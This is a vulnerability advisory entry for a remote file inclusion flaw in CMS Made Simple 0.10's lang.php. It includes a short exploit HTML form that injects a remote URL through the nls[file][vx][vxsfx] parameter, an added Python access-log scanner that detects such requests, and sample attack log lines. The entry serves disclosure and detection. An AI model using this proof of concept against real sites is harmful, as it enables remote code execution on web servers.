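|Vulnerability details
CMS Made Simple is an easy-to-use content management system for websites with simple, stable content. It is developed with PHP, MySQL and the Smarty template engine. Its features include a role-based permission management system, an intelligent caching mechanism (content is fetched from the database only when needed), wizard-based installation and update, and low system resource usage; it also includes file management, news publishing and RSS modules. A PHP remote file inclusion vulnerability in lang.php in CMS Made Simple 0.10 and earlier allows remote attackers to execute arbitrary PHP code via the nls[file][vx][vxsfx] parameter.
|Exploit (EXP)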
source: http://www.securityfocus.com/bid/14709/info
CMS Made Simple is prone to a remote file include vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input.
An attacker may exploit this issue to execute arbitrary remote PHP code on an affected computer with the privileges of the Web server process. This may facilitate unauthorized access.
CMS Made Simple Version .10 and all prior versions are reported vulnerable.
example.html:
<form action="http://www.example.com/admin/lang.php?CMS_ADMIN_PAGE=1&nls[file][vx][vxsfx]=(__URL__)" method=post>
<input type=hidden name=change_cms_lang value=vx>
<input type=submit name=test VALUE="do it">
</form>
EOF
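Added example, not part of the original advisory: because the form above carries the nls[file][vx][vxsfx] value in the query string of the POST target, the request is visible in ordinary web server access logs. The Python sketch below flags such requests; the combined log format, the function names and the sample log lines (documentation IPs, a .invalid host) are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Request line of a combined-format access log entry (assumed log format).
REQUEST_RE = re.compile(r'"[A-Z]+ (?P<target>\S+) HTTP/[\d.]+"')
# A value that starts with scheme:// (http, ftp, php, ...) or with data:
REMOTE_RE = re.compile(r'^\s*(?:[a-z][a-z0-9+.\-]*://|data:)', re.I)

def find_nls_injection(line):
    """Return [(param, value)] for nls[...] query parameters on lang.php
    whose value is a URL or stream wrapper; empty list otherwise."""
    m = REQUEST_RE.search(line)
    if not m:
        return []
    try:
        parts = urlsplit(m.group("target"))
    except ValueError:  # malformed request target, nothing to inspect
        return []
    if parts.path.rsplit("/", 1)[-1].lower() != "lang.php":
        return []
    # parse_qsl percent-decodes keys and values, so nls%5Bfile%5D matches too.
    return [(k, v) for k, v in parse_qsl(parts.query, keep_blank_values=True)
            if k.lower().startswith("nls[") and REMOTE_RE.search(v)]

def scan(lines):
    """Return (line_number, source_ip, hits) for every flagged log line."""
    findings = []
    for n, line in enumerate(lines, 1):
        hits = find_nls_injection(line)
        if hits:
            findings.append((n, line.split(" ", 1)[0], hits))
    return findings

# Constructed sample log lines, not taken from a real server.
SAMPLE_LOG = [
    '203.0.113.7 - - [31/Aug/2005:10:00:00 +0000] "POST /admin/lang.php?'
    'CMS_ADMIN_PAGE=1&nls[file][vx][vxsfx]=http://host.invalid/x.txt HTTP/1.1" 200 512',
    '203.0.113.7 - - [31/Aug/2005:10:00:05 +0000] "POST /admin/lang.php?'
    'nls%5Bfile%5D%5Bvx%5D%5Bvxsfx%5D=http%3A%2F%2Fhost.invalid%2Fx.txt HTTP/1.1" 200 512',
    '198.51.100.4 - - [31/Aug/2005:10:01:00 +0000] "GET /admin/lang.php HTTP/1.1" 200 1024',
    '198.51.100.4 - - [31/Aug/2005:10:02:00 +0000] "GET /index.php?page=news HTTP/1.1" 200 2048',
]

if __name__ == "__main__":
    for n, ip, hits in scan(SAMPLE_LOG):
        print(f"line {n}: {ip} sent {hits}")
```

Values that are percent-encoded more than once are decoded only one level here, so a production rule should normalise the request target before matching.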
|References
Source: SECUNIA
Name: 16654
Link: http://secunia.com/advisories/16654/
Source: forum.cmsmadesimple.org
Link: http://forum.cmsmadesimple.org/index.php/topic,1549.0.html
Source: BID
Name: 14709
Link: http://www.securityfocus.com/bid/14709
Source: BUGTRAQ
Name: 20050831CMSMadeSimple<=0.10-PHPinjection
Link: http://marc.theaimsgroup.com/?l=bugtraq&m=112552342004406&w=2